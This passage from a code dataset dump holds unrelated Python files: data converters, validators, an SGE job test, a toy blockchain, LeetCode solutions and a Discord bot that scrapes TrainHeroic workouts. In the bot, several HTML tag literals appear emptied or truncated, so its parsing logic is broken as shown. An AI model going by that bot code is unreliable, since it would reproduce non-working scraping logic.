self.config.get(\"activate_path\"))\n self.logger.info(\"activate payload is %s\" % self.config.get(\"activate_payload\"))\n\n def start(self):\n with Promise() as p:\n \n if self.config.get(\"enable_activate\") is True:\n\n from .client import XIXIntentClient\n fullpath = self.config[\"activate_path\"]\n# fullpath = \"intent://eu.fistar.sdcs\"\n parsed = urlparse(fullpath)\n request_indication = UpdateRequestIndication(path=\"/m2m\",\n resource=str(self.config[\"activate_payload\"]),\n content_type=\"application/json\")\n# request_indication.path = urlunparse(ParseResult(\"\", \"\", *parsed[2:]))\n client = XIXIntentClient(parsed.netloc, self.config[\"Issuer\"], self.logger, self.config[\"listenActions\"])\n p.fulfill(client.send_request_indication(request_indication))\n\n else:\n #p.reject(\"test_only enabled\")\n p.fulfill(None)\n return p\n","repo_name":"elastest/elastest-device-emulator-service","sub_path":"eds/FrontEnd/server/openmtc-server/src/openmtc_server/plugins/transport_android_intent/activate.py","file_name":"activate.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"41664039931","text":"import json\r\nimport xml.etree.ElementTree as ET\r\nimport os\r\nfrom tqdm import tqdm\r\nfrom PIL import Image\r\nimages = []\r\nannotations = []\r\ncategories = [\r\n {'name':'paragraph', 'id': 1, 'supercategory': ''},\r\n {'name':'title', 'id': 2, 'supercategory': ''},\r\n {'name':'table', 'id': 3, 'supercategory': ''},\r\n {'name':'figure', 'id': 4, 'supercategory': ''},\r\n {'name':'plot', 'id': 5, 'supercategory': ''},\r\n {'name':'formula', 'id': 6, 'supercategory': ''},\r\n]\r\nanno_id = 0\r\nimage_id = 0\r\nfor i, fname in enumerate(tqdm(os.listdir('output/jsons'))):\r\n if True:\r\n fname = fname[:-5]\r\n f = json.load(open(f'output/jsons/{fname}.json', 'r'))\r\n image_id += 1\r\n img_info = {}\r\n imz = Image.open(f'output/images/{fname}.jpg')\r\n img_info['width'] = imz.size[0]\r\n img_info['height'] = imz.size[1]\r\n img_info['file_name'] = fname+'.jpg'\r\n img_info['id'] = image_id\r\n images.append(img_info)\r\n \r\n paras = []\r\n for _, para in enumerate(f['para']):\r\n if isinstance(para,list):\r\n paras.extend(para)\r\n else:\r\n paras.append(para)\r\n for _, para in enumerate(paras):\r\n annotation = {}\r\n if isinstance(para,list):\r\n print(para)\r\n anno_id += 1\r\n annotation['id'] = anno_id\r\n annotation['image_id'] = image_id\r\n annotation['bbox'] = (para['bbox'][0], para['bbox'][1], para['bbox'][2] - para['bbox'][0],para['bbox'][3] - para['bbox'][1])\r\n annotation['iscrowd'] = 0\r\n if para['component'] == 'paragraph':\r\n annotation['category_id'] = 1\r\n elif para['component'] == 'natural_image':\r\n annotation['category_id'] = 4\r\n elif para['component'] == 'plot':\r\n annotation['category_id'] = 5\r\n elif para['component'] == 'formula':\r\n annotation['category_id'] = 6\r\n elif para['component'] == 'title':\r\n annotation['category_id'] = 2\r\n elif para['component'] == 'table':\r\n annotation['category_id'] = 3\r\n annotations.append(annotation)\r\n else: pass\r\nres = {'images': images, 'annotations': annotations, 'categories': categories}\r\njson.dump(res, 
open('train.json','w'))\r\n","repo_name":"personwhofloat/SDL-Document-Image-Generation","sub_path":"data_manipulation/convert_to_coco.py","file_name":"convert_to_coco.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"21403726584","text":"__author__ = 'Martin'\n\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type head1, head1: ListNode\n :rtype: ListNode\n \"\"\"\n l1 = 0\n l2 = 0\n p1 = headA\n p2 = headB\n while p1 is not None:\n l1 += 1\n p1 = p1.next\n while p2 is not None:\n l2 += 1\n p2 = p2.next\n dif = l1 - l2\n p1 = headA\n p2 = headB\n if dif < 0:\n while dif < 0:\n p2 = p2.next\n dif += 1\n if dif > 0:\n while dif > 0:\n p1 = p1.next\n dif -= 1\n\n while p1 is not None and p2 is not None:\n if p1 == p2:\n return p1\n p1 = p1.next\n p2 = p2.next\n\n return None\n#http://www.geeksforgeeks.org/write-a-function-to-get-the-intersection-point-of-two-linked-lists/","repo_name":"MartinTrojans/Leetcode-Python","sub_path":"intersection of two linked list.py","file_name":"intersection of two linked list.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15395399022","text":"import torch\n\n\npreds = torch.tensor(\n [[0.2, 0.3, 0.0, 0.7, 0.5], [0.1, 0.2, 0.3, 0.4, 0.5], [0.5, 0.2, 0.1, 0.8, 0.2]]\n)\ntargets = torch.tensor([3, 4, 1], dtype=torch.long)\n\nhot_targets = torch.nn.functional.one_hot(targets, num_classes=5).to(dtype=torch.float)\n\nweights = torch.tensor([1, 0.75, 0.2, 1, 0.1], dtype=torch.float)\n\nloss_function = torch.nn.functional.cross_entropy\n\nnum = loss_function(preds, targets)\n\nprint(f\"Loss for no weights normal: {num.item()}\")\n\nnum = loss_function(preds, hot_targets)\n\nprint(f\"Loss for no weights one hot: {num.item()}\")\n\nnum = loss_function(preds, targets, weights)\n\nprint(f\"Loss for weighted normal: {num.item()}\")\n\nnum = loss_function(preds, hot_targets, weights)\n\nprint(f\"Loss for weighted one hot: {num.item()}\")\n","repo_name":"maartenlb/solar-panel-supervision","sub_path":"utils/one_hot_loss_check.py","file_name":"one_hot_loss_check.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24056295235","text":"from pathlib import Path\nimport arrow\nimport re\nimport json\nimport requests\nfrom typing import Literal\n\n\nTimeframeName = Literal[\"creation\", \"review\", \"inquiry\"]\n\n\nPATTERNS: dict[TimeframeName, re.Pattern] = {\n \"creation\": re.compile(\n r\"Current case creation time frame: As of (?P\\d+-\\w+-\\d+), we are working on cases that were received from USCIS on (?P\\d+-\\w+-\\d+).\"\n ),\n \"review\": re.compile(\n r\"Current case review time: As of (?P\\d+-\\w+-\\d+), we are reviewing documents submitted to us on (?P\\d+-\\w+-\\d+).\"\n ),\n \"inquiry\": re.compile(\n r\"As of (?P\\d+-\\w+-\\d+), we are responding to inquiries received on (?P\\d+-\\w+-\\d+).\"\n ),\n}\nData = dict[TimeframeName, dict[str, int]]\n\n\nDATA_PATH = Path(\"data.json\")\nwith DATA_PATH.open() as data_file:\n data: Data = json.load(data_file)\n\n\nr = requests.get(\n \"https://travel.state.gov/content/travel/en/us-visas/immigrate/nvc-timeframes.html\"\n)\n\nfor timeframe_name, pattern in 
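convert_to_coco above writes each bbox as (x, y, width, height), COCO's convention, from the generator's corner-style (x1, y1, x2, y2) boxes; the transform in isolation:

def corners_to_coco(x1, y1, x2, y2):
    # COCO boxes are top-left corner plus extent, not two corners.
    return (x1, y1, x2 - x1, y2 - y1)

print(corners_to_coco(10, 20, 50, 80))  # (10, 20, 40, 60)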
PATTERNS.items():\n timeframe_data = data[timeframe_name]\n match = pattern.search(r.text)\n if not match:\n continue\n as_of_date = arrow.get(match.group(\"as_of_date\"), \"D-MMM-YYYY\")\n latest_date = arrow.get(match.group(\"latest_date\"), \"D-MMM-YYYY\")\n\n timeframe_data[as_of_date.date().isoformat()] = (as_of_date - latest_date).days\n\nwith DATA_PATH.open(\"w\") as data_file:\n json.dump(data, data_file, indent=2)\n data_file.write(\"\\n\")\n","repo_name":"underyx/nvc-backlog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"39277660178","text":"\"\"\"\nBaseValidator module.\nIt serves as an base to all other validators childs.\n\"\"\"\n\nfrom datetime import datetime\nimport jsonschema\nfrom jsonschema import Draft4Validator\nfrom bson.objectid import ObjectId\n\n_types = {\n 'object_id': ObjectId\n}\n\n\nclass ValidationError(Exception):\n def __init__(self, *args, errors: list=None, messages: list=None, **kwargs):\n super().__init__(*args, **kwargs)\n self.messages = messages\n self.errors = errors\n\n\nclass JsonSchemaValidator():\n TYPES = _types\n SCHEMA = dict()\n VALIDATOR = None\n\n def __init__(self, schema: dict, additional_types: dict=None, **kwargs):\n \"\"\"\n Arguments:\n schema {dict} -- valida jsonschema\n Keyword Arguments:\n additional_types {dict} -- additional types to be checked against (default: {None})\n \"\"\"\n\n self.SCHEMA = schema\n if additional_types:\n self.TYPES = dict(self.TYPES, **additional_types)\n self.VALIDATOR = Draft4Validator(self.SCHEMA, types=self.TYPES)\n self.VALIDATOR.VALIDATORS['method'] = self.__method\n\n def __method(self, validator, fn, instance, schema):\n try:\n fn(instance, validator=validator)\n except Exception as e:\n yield ValidationError(\"%r failed for %r: %r\" % (instance, fn.__name__, e))\n\n def validate(self, instance):\n messages = list()\n errors = list()\n for e in self.VALIDATOR.iter_errors(instance):\n errors.append(e)\n messages.append(e.schema.get('description', e.message))\n if len(errors):\n msg = '\\n'.join(messages)\n raise ValidationError(msg, messages=messages, errors=errors)\n return True\n\ndef validate_once(instance, schema, additional_types: dict=None, **kwargs):\n validator = JsonSchemaValidator(schema, additional_types=additional_types, **kwargs)\n validator.validate(instance)\n return True\n\n\nclass BaseValidator:\n \"\"\"\n BaseValidator class.\n\n :method validate(ruleSet, methods): Validation main function.\n :method validate_datetime(field, rule): Validates if a field is a datatime.\n :method validate_integer(field, rule): Validates if a field is an integer.\n :method validate_float(field, rule): Validates if a field is a float.\n :method validate_str(field, rule): Validates if a field is a string.\n :method validate_objectid(field, rule): Validates if a field is an objectid.\n :method validate_object(field, rule): Validates if a field is an object.\n :method validate_array(field, rule): Validates if a field is an array\n \"\"\"\n CREATE = \"CREATE\"\n UPDATE = \"UPDATE\"\n DELETE = \"DELETE\"\n REQUIRED = \"required\"\n OPTIONAL = \"optional\"\n MISSING = \"missing\"\n\n def __init__(self, params):\n\n self.params = params\n self.errors = []\n self.rules = {\n\n }\n\n def validate(self, rule_set, methods=[]):\n \"\"\"\n Validation main function.\n\n :param rule_set: Sets of rules to be validated.\n :param methods: Methods to be called.\n :return: 
Return is there was any error.\n \"\"\"\n valid = True\n if self.rules.get(rule_set) is None:\n raise Exception(\"O Conjunto de regras \" +\n rule_set + \" não esta definido.\")\n\n for k, rule in self.rules[rule_set].items():\n if rule.get(\"presence\") is None:\n raise Exception(\n \"A propriedade presence é obrigatória na regra \" + k)\n\n if rule.get(\"format\") is None:\n raise Exception(\n \"A propriedade format é obrigatória na regra \" + k)\n\n if rule[\"presence\"] == self.REQUIRED and self.params.get(k) is None:\n self.errors.append(\"Atributo '\" + k +\n \"' é requerido e não está presente\")\n\n elif rule[\"presence\"] == self.MISSING and self.params.get(k) is not None:\n self.errors.append(\"Atributo '\" + k +\n \"' não pode estar preenchido\")\n\n elif self.params.get(k) is not None:\n if \"datetime\" == rule[\"format\"]:\n if not self.validate_datetime(self.params[k], rule):\n self.errors.append(\n \"A data '\" + k + \"' esta em um formato inválido: \" + self.params[k])\n\n if \"integer\" == rule[\"format\"]:\n if not self.validate_integer(self.params[k], rule):\n self.errors.append(\n \"O inteiro '\" + k + \"' esta em um formato inválido: \" + self.params[k])\n\n if \"float\" == rule[\"format\"]:\n if not self.validate_float(self.params[k], rule):\n self.errors.append(\n \"O decimal '\" + k + \"' esta em um formato inválido: \" + self.params[k])\n\n if \"string\" == rule[\"format\"]:\n if not self.validate_str(self.params[k], rule):\n self.errors.append(\n \"A string '\" + k + \"' esta em um formato inválido\")\n\n if \"array\" == rule[\"format\"]:\n if not self.validate_array(self.params[k], rule):\n self.errors.append(\n \"O array '\" + k + \"' esta em um formato inválido\")\n\n if \"objectid\" == rule[\"format\"]:\n if not self.validate_objectid(self.params[k], rule):\n self.errors.append(\n \"O ObjectId '\" + k + \"' esta em um formato inválido: \" + self.params[k])\n\n if \"object\" == rule[\"format\"]:\n if not self.validate_object(self.params[k], rule):\n self.errors.append(\n \"O Object '\" + k + \"' esta em um formato inválido\")\n\n if \"boolean\" == rule[\"format\"]:\n if not self.validate_boolean(self.params[k], rule):\n self.errors.append(\n \"O Boolean '\" + k + \"' esta em um formato inválido\")\n\n for method in methods:\n m = getattr(self, method)\n if m is not None:\n m()\n\n return len(self.errors) == 0\n\n def validate_datetime(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is a datatime.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n a = datetime.strptime(field[:19], \"%Y-%m-%dT%H:%M:%S\")\n return True\n except Exception as e:\n return False\n\n def validate_integer(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is an integer.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n a = int(field)\n return True\n except Exception as e:\n return False\n\n def validate_float(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is a float.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n a = float(field)\n return True\n except Exception as e:\n return False\n\n def validate_str(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is a 
string.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n valid = True\n a = str(field)\n if rule.get(\"min\"):\n valid = valid and len(a) >= rule[\"min\"]\n if rule.get(\"max\"):\n valid = valid and len(a) <= rule[\"max\"]\n\n return valid\n except Exception as e:\n return False\n\n def validate_objectid(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is an objectid.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n valid = True\n a = ObjectId(field)\n return True\n except Exception as e:\n return False\n\n def validate_object(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is an object.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n valid = True\n a = dict(field)\n return True\n except Exception as e:\n return False\n\n def validate_array(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is an array.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n valid = True\n a = list(field)\n if rule.get(\"min\"):\n valid = valid and len(a) >= rule[\"min\"]\n if rule.get(\"max\"):\n valid = valid and len(a) <= rule[\"max\"]\n return valid\n except Exception as e:\n return False\n\n def validate_boolean(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is an boolean.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n return type(field) == bool\n except Exception as e:\n return False\n","repo_name":"newwaybrazil/mongo-odm","sub_path":"odm/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":10150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2347831017","text":"import pytest\nimport pytest_mock\nimport os\n\nos.environ['SGE_ROOT'] = '/opt'\nos.environ['SGE_ARCH'] = 'amd64'\nimport sge.submit\n\nRESPONSE = \"\"\"Some stuff about a warning.\nYour job 35305 (\"sleeper.sh\") has been submitted\n\"\"\"\n\n@pytest.fixture\ndef mega_job_request():\n import datetime\n request = sge.submit.JobRequest()\n request.command = '/usr/local/bin/quuxtable'\n request.arguments = ['foo', 'baz', 'quux']\n request.deadline_time = datetime.datetime(2018, 1, 5)\n request.start_time = datetime.datetime(2018, 1, 4)\n request.environment = {'bax' : 'qaax', 'foot' : 'head'}\n request.job_submission_state = sge.submit.JobSubmissionState.HOLD_STATE\n request.join_stdout_and_stderr = True\n\n request.name = 'bartholomew'\n request.output_path = \"/tmp\"\n request.working_directory = '/home/funkytron/mywd'\n\n return request\n\n@pytest.fixture\ndef basic_job_request():\n request = sge.submit.JobRequest()\n request.command = '/usr/local/bin/quuxtable'\n return request\n\n \n\nEXPECTED_ARGS = ['/opt/bin/amd64/qsub', '-dl', '201801050000.00', '-a', '201801040000.00', \n '-v', 'bax=qaax,foot=head', '-h', '-j', 'yes', '-N', 'bartholomew', \n '-o', '/tmp', '-wd', '/home/funkytron/mywd', \n '/usr/local/bin/quuxtable', 'foo', 'baz', 'quux']\ndef test_do_something_cool(mega_job_request, 
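A hedged sketch of wiring a concrete validator onto BaseValidator above; the rule-set name, fields, and bounds are invented for illustration:

class UserValidator(BaseValidator):
    def __init__(self, params):
        super().__init__(params)
        self.rules = {
            "CREATE": {
                "name": {"presence": self.REQUIRED, "format": "string", "min": 1, "max": 80},
                "age": {"presence": self.OPTIONAL, "format": "integer"},
            }
        }

v = UserValidator({"name": "Ada"})
assert v.validate("CREATE") and not v.errors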
mocker):\n mocker.patch('sge.shell.run')\n sge.shell.run.return_value = RESPONSE\n job_id = mega_job_request.submit()\n sge.shell.run.assert_called_once_with(*EXPECTED_ARGS)\n assert job_id == 35305\n\nEXPECTED_ARGS2 = ['/opt/bin/amd64/qsub', '/usr/local/bin/quuxtable']\ndef test_do_something_basic(basic_job_request, mocker):\n mocker.patch('sge.shell.run')\n sge.shell.run.return_value = RESPONSE\n job_id = basic_job_request.submit()\n sge.shell.run.assert_called_once_with(*EXPECTED_ARGS2)\n assert job_id == 35305\n","repo_name":"tylergannon/remote_sge","sub_path":"src/sge/tests/job_submission_test.py","file_name":"job_submission_test.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"44736700376","text":"import datetime as d\nimport hashlib as h\n#from sqlite3 import Timestamp\n\n\nclass Block:\n def __init__(self, index, timestamp, data, prevhash):\n self.index = index\n self.timestamp = timestamp\n self.data = data\n self.prevhash = prevhash\n\n self.hash = self.hashblock()\n\n def hashblock(self):\n block_encryption = h.sha256()\n assemble = bytes((str(self.index) + str(self.timestamp) + str(self.data) + str(self.prevhash)).encode('utf-8'))\n block_encryption.update(assemble)\n return block_encryption.hexdigest()\n\n @staticmethod\n def genesisblock():\n return Block(0, d.datetime.now(), \"genesis block trabsaction\", \" \")\n\n @staticmethod\n def newBlock(lastblock):\n index = lastblock.index + 1\n timestamp = d.datetime.now()\n hashblock = lastblock.hash\n data = \"Transaction \" + str(index)\n return Block(index, timestamp, data, hashblock)\n\n\nblockchain = [Block.genesisblock()]\nprevblock = blockchain[0]\n\nfor i in range(0, 5):\n addblock = Block.newBlock(prevblock)\n blockchain.append(addblock)\n prevblock = addblock\n\n print(\"Block ID {} \".format(addblock.index))\n print(\"Timestamp:{}\".format(addblock.timestamp))\n print(\"Hash of the block:{}\".format(addblock.hash))\n print(\"Previous Block Hash:{}\".format(addblock.prevhash))\n print(\"data:{}\\n\".format(addblock.data))\n\n","repo_name":"soaresvi/blockchain_codes","sub_path":"basic_blockchain.py","file_name":"basic_blockchain.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"16323244505","text":"import logging\nimport os\nfrom configs import config\n\n\ndef get_logger():\n log = logging.getLogger('mainlgr')\n os.chdir(os.path.join(config.PROJECT_PATH, config.LOGS_PATH))\n logging.basicConfig(filename='automation.log',\n format='[%(levelname)s] %(asctime)s %(message)s',\n datefmt='%d-%m-%y %H:%M:%S', level=logging.INFO, filemode='w')\n os.chdir(config.PROJECT_PATH)\n return log\n","repo_name":"rishjaiswal/python-automation-framework","sub_path":"utils/logger_utils.py","file_name":"logger_utils.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"35681119477","text":"import collections\nfrom typing import List\n\n\nclass Solution:\n def largestOverlap(self, img1: List[List[int]], img2: List[List[int]]) -> int:\n # filter all positions that equal to 1 in img1 and img2\n img1 = [(i, j) for i, row in enumerate(img1)\n for j, item in enumerate(row) if item]\n img2 = [(i, j) for i, row in enumerate(img2)\n for j, item in enumerate(row) if item]\n # mapping overlap count between every possible translation\n count = 
collections.Counter((x1-x2, y1-y2)\n for x1, y1 in img1 for x2, y2 in img2)\n return max(count.values() or [0])\n\n\nsol = Solution()\nprint(sol.largestOverlap([[1, 1, 0], [0, 1, 0], [0, 1, 0]], [\n [0, 0, 0], [0, 1, 1], [0, 0, 1]]))\n","repo_name":"kranzCh/LeetcodePy","sub_path":"old_solutions_without_extension/P835.py","file_name":"P835.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23983382785","text":"from webbot import Browser \nfrom bs4 import BeautifulSoup\nimport time\nimport discord\nimport sys\n\nTOKEN = ''\nclient = discord.Client()\n@client.event\nasync def on_ready():\n\tawait client.change_presence(activity = discord.Game('th!help'))\n\n\n\n@client.event\nasync def on_message(message):\n\tif message.content == \"th!help\":\n\t\tawait message.channel.send(\"Use th!workout to get todays workout! Please note that it may take a while for the workout to be sent after the command\")\n\tif message.content == \"th!workout\":\n\t\tglobal pretext\n\t\tglobal insactive\n\t\tglobal flexactive\n\t\tglobal h5active\n\t\tglobal iactive\n\t\tglobal cellactive\n\t\tglobal headactive\n\t\tglobal hactive\n\t\turl = 'https://athlete.trainheroic.com/#/login?redirectUrl=https%253A%252F%252Fathlete.trainheroic.com%252F%2523%252Ftraining'\n\t\tweb = Browser()\n\t\tweb.go_to(url)\n\t\tweb.type('@gmail.com' , into='Email')\n\t\tweb.type('' , into='Password' , id='passwordFieldId')\n\t\tweb.click('Log in' , tag='span')\n\t\ttime.sleep(3)\n\t\tpretext = ''\n\t\ttext = ''\n\t\tinsactive = False\n\t\tflexactive = False\n\t\th5active = False\n\t\tiactive = False\n\t\tcellactive = False\n\t\theadactive = False\n\t\thactive = False\n\t\ttextlist = []\n\t\tdef textgrab(start, end, funactive):\n\t\t\tglobal pretext\n\t\t\tglobal insactive\n\t\t\tglobal flexactive\n\t\t\tglobal h5active\n\t\t\tglobal iactive\n\t\t\tglobal cellactive\n\t\t\tglobal headactive\n\t\t\tglobal hactive\n\t\t\tif webtext[i+len(start)-1:i+len(start)+len(end)-1] == end and funactive:\n\t\t\t\tif start == '

':\n\t\t\t\t\ttextlist.append([pretext, 'flex'])\n\t\t\t\t\tpretext = ''\n\t\t\t\t\tflexactive = False\n\t\t\t\tif start == '

':\n\t\t\t\t\ttextlist.append([pretext, 'ins'])\n\t\t\t\t\tpretext = ''\n\t\t\t\t\tinsactive = False\n\t\t\t\tif start == '

':\n\t\t\t\t\ttextlist.append([pretext, 'h5'])\n\t\t\t\t\tpretext = ''\n\t\t\t\t\th5active = False\n\t\t\t\tif start == '':\n\t\t\t\t\tpretext = pretext[:-1] + '\\n' + pretext[-1:]\t\t\t\t\n\t\t\t\t\ttextlist.append([pretext, 'i'])\n\t\t\t\t\tpretext = ''\n\t\t\t\t\tiactive = False\n\t\t\t\tif start == 'cell\" aria-hidden=\"false\">':\n\t\t\t\t\ttextlist.append([pretext, 'cell'])\n\t\t\t\t\tpretext = ''\n\t\t\t\t\tcellactive = False\n\t\t\t\tif start == 'class=\"header ng-hide\" aria-hidden=\"true\">':\n\t\t\t\t\ttextlist.append([pretext, 'head'])\n\t\t\t\t\tpretext = ''\n\t\t\t\t\theadactive = False\n\t\t\t\tif start == 'class=\"header\" aria-hidden=\"false\">':\n\t\t\t\t\ttextlist.append([pretext, 'head'])\n\t\t\t\t\tpretext = ''\n\t\t\t\t\thactive = False\n\t\t\t\treturn False\n\n\n\t\t\tif funactive or webtext[i:i+len(start)] == start:\n\t\t\t\tif start == '
':\n\t\t\t\t\th5active = True\n\t\t\t\tif start == '

':\n\t\t\t\t\tflexactive = True\n\t\t\t\tif start == '

':\n\t\t\t\t\tinsactive = True\n\t\t\t\tif start == '':\n\t\t\t\t\tiactive = True\n\t\t\t\tif start == 'cell\" aria-hidden=\"false\">':\n\t\t\t\t\tcellactive = True\n\t\t\t\tif start == 'class=\"header ng-hide\" aria-hidden=\"true\">':\n\t\t\t\t\theadactive = True\n\t\t\t\tif start == 'class=\"header\" aria-hidden=\"false\">':\n\t\t\t\t\thactive = True\n\t\t\t\tpretext += webtext[i+len(start)]\n\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\n\t\twebtext = web.get_page_source()\n\n\n\t\tfor i in range(len(webtext) - 24):\n\t\t\ttextgrab('

', '

', insactive)\n\t\t\ttextgrab('

', '

', flexactive)\n\t\t\ttextgrab('
', '
', h5active)\n\t\t\ttextgrab('', '', iactive)\n\t\t\ttextgrab('cell\" aria-hidden=\"false\">', '', cellactive)\n\t\t\ttextgrab('class=\"header ng-hide\" aria-hidden=\"true\">', '', headactive)\n\t\t\ttextgrab('class=\"header\" aria-hidden=\"false\">', '', hactive)\n\n\t\tdef divide_chunks(l, n): \n\t\t\tfor i in range(0, len(l), n): \n\t\t\t\tyield l[i:i + n]\n\n\t\t\n\t\tnewtextlist = []\n\t\tnewnewtextlist = []\n\t\tembed = discord.Embed(\n\t\t\tcolor=0x5CDBF0,\n\t\t\ttimestap='now'\n\t\t\t)\n\n\t\tfor i in range(len(textlist)):\n\t\t\tif len(textlist[i][0]) >= 1 and 'COMPLETE' not in textlist[i][0]:\n\t\t\t\tnewtextlist.append([textlist[i][0][:-1], textlist[i][1]])\n\t\t\n\t\tprint(newtextlist)\n\t\tfor i in range(len(newtextlist)):\n\t\t\tif newtextlist[i][1] == 'head':\n\t\t\t\tnewtextlist[i+1][0] += ' '+ int(newtextlist[i][0][0]) * '- '\n\t\t\t\tnewtextlist[i+1][0] = '\\n' + newtextlist[i+1][0] + '\\n'\n\t\t\t\tnewtextlist[i+2][0] += ' ' + int(newtextlist[i][0][0]) * '- ' + '\\n\\n'\n\t\t\tif newtextlist[i][1] == 'h5':\n\t\t\t\tnewnewtextlist.append([newtextlist[i][0], ''])\n\t\t\telif len(newnewtextlist) > 0 and newtextlist[i][1] != 'head':\n\t\t\t\tnewnewtextlist[-1][1] += newtextlist[i][0]\n\t\tfor i in newnewtextlist:\n\t\t\tif i[0] != '':\n\t\t\t\tembed.add_field(name = i[0], value = i[1])\n\t\tawait message.channel.send(embed=embed)\n\t\t\n\tif str(message.author) == 'amberhalo#7086':\n\t\tif message.content == \"th!end\":\n\t\t\tsys.exit()\nclient.run(TOKEN)\n","repo_name":"amberhalo/TrainHeroic","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40702047456","text":"from Controller import Controller\nimport time\nimport sys\ndef main():\n graph_path = sys.argv[1]\n save_path = sys.argv[2]\n c = Controller(graph_path,save_path)\n #c.draw_graphs()\n #return\n# c.min_max_path_charts()\n start = ntimes = step = 0\n\n while(True):\n option = int(input(\"Select option: \\n\"+\n \"1. Execute fishbone heuristics \\n\"+\n \"2. Execute spiderweb heuristics\\n\"+\n \"3. Calculate properties\\n\"\n \"5. 
Compare heuristics and generate plot\\n\"))\n t = time.time()\n if option in {1,2}:\n start = int(input(\"Start: \"))\n ntimes = int(input(\"Iterations: \"))\n step = int(input(\"Step: \"))\n\n if(option == 1):\n c.executeFishbone(start, ntimes, step)\n elif(option == 2):\n c.executeSpiderweb(start, ntimes, step)\n elif(option == 3):\n c.calculate_properties()\n elif(option == 4):\n c.compare()\n else:\n break\n print(\"Time: \"+str(time.time()-t))\n\n #c.draw_graphs()\n# t = time.time()\n# print(\"Efficiency ratio: \"+str(c.efficiency()))\n# print(\"Time: \"+str(time.time()-t))\n# print(\"Edges ratio: \" + str(c.ratio()))\nif __name__ == \"__main__\":\n main()\n","repo_name":"willunicamp/droneways","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"4986635005","text":"from scipy.sparse import csr_matrix, vstack, hstack, eye, issparse\nimport numpy as np\nimport pandas as pd\n\ndef findcommonZ(Z1, Z2):\n '''\n FINDCOMMONZ --- Find common(distinct) Z and permutation matrices R1, R2\n\n R1,R2,Z = findcommonZ(Z1,Z2)\n\n Given two vectors of monomials Z1 and Z2, this \n function will compute another vector of monomials Z\n containing all the distinct monomials of Z1 and Z2, and\n permutation matrices R1, R2 such that\n\n Z1 = R1*Z\n Z2 = R2*Z\n\n Assumption: all the monomials in Z1, as well as\n the monomials in Z2, are DISTINCT --- but Z1 and Z2 may \n have common monomials.\n '''\n\n # Check if Z1 and Z2 are sparse matrix\n if not issparse(Z1):\n Z1 = csr_matrix(Z1)\n if not issparse(Z2):\n Z2 = csr_matrix(Z2)\n\n if (Z1.shape[0] + Z2.shape[0]) <= 1:\n Z = vstack([Z1, Z2])\n R1 = eye(Z1.shape[0], Z.shape[0])\n R2 = eye(Z2.shape[0], Z.shape[0])\n\n return R1, R2, Z\n \n # Constructing index matrix\n sizeZ1 = Z1.shape[0]\n Ind1 = np.arange(sizeZ1)[:, None]\n sizeZ2 = Z2.shape[0]\n Ind2 = np.arange(sizeZ2)[:, None]\n Ind = np.block([[Ind1, np.full(Ind1.shape, sizeZ2)], [np.full(Ind2.shape, sizeZ1), Ind2]])\n \n # Constructing Z\n ZZ = vstack([Z1, Z2])\n ZZ_temp = pd.DataFrame(ZZ.toarray())\n IndSort = ZZ_temp.sort_values(by=list(ZZ_temp.columns)).index\n ZZ = ZZ[IndSort]\n ZTemp = 